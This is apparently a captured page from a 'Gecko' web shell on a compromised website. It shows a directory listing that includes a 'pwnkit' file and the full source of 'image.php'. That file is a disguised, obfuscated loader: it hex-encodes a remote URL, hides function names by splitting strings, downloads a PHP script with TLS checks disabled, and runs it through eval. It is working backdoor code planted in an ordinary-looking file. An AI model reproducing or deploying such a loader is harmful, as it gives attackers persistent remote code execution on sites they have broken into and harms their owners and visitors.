Gecko [ sachasauda.akalacademy.ac.in ]

Name	Size	Permission
YING77	[ DIR ]	drwxr-xr-x
bootstrap	[ DIR ]	drwxr-xr-x
.DS_Store	6 KB	-rwxr-xr-x
.htaccess	197 B	-r--r--r--
.mad-root	0 B	-rw-r--r--
_site-base.scss	4.14 KB	-rwxr-xr-x
_site-blocks.scss	10.18 KB	-rwxr-xr-x
_site-navbar.scss	7.25 KB	-rwxr-xr-x
error_log	836 B	-rw-r--r--
image.php	1.49 KB	-rw-r--r--
index.php	36.62 KB	-rw-r--r--
pwnkit	0 B	-rwxr-xr-x
style.scss	194 B	-rwxr-xr-x
wp-blog-header.php	4.57 KB	-r--r--r--
wp-cron.php	4.57 KB	-rw-r--r--

Code Editor : image.php

<?php
$hexUrl = '68747470733a2f2f7261772e6769746875622e636f6d2f43616c6c4d654261746f7361792f414c46415f313333372f6d61696e2f616c66612e706870';

function hex2str($hex) {
    $str = '';
    for ($i = 0; $i < strlen($hex) - 1; $i += 2) {
        $str .= chr(hexdec($hex[$i] . $hex[$i + 1]));
    }
    return $str;
}

$url = hex2str($hexUrl);

function downloadWithFileGetContents($url) {
    if (ini_get('a' . 'llow' . '_ur' . 'l_fo' . 'pe' . 'n')) {
        return file_get_contents($url);
    }
    return false;
}

function downloadWithCurl($url) {
    if (function_exists('c' . 'u' . 'rl' . '_i' . 'n' . 'i' . 't')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
    return false;
}

$phpScript = downloadWithFileGetContents($url);
if ($phpScript === false) {
    $phpScript = downloadWithCurl($url);
}
if ($phpScript === false) {
    $phpScript = downloadWithFopen($url);
}

if ($phpScript === false) {
    die("Gagal mendownload script PHP dari URL dengan semua metode.");
}

eval('?>' . $phpScript);
?>

${this.title}

Code Editor : image.php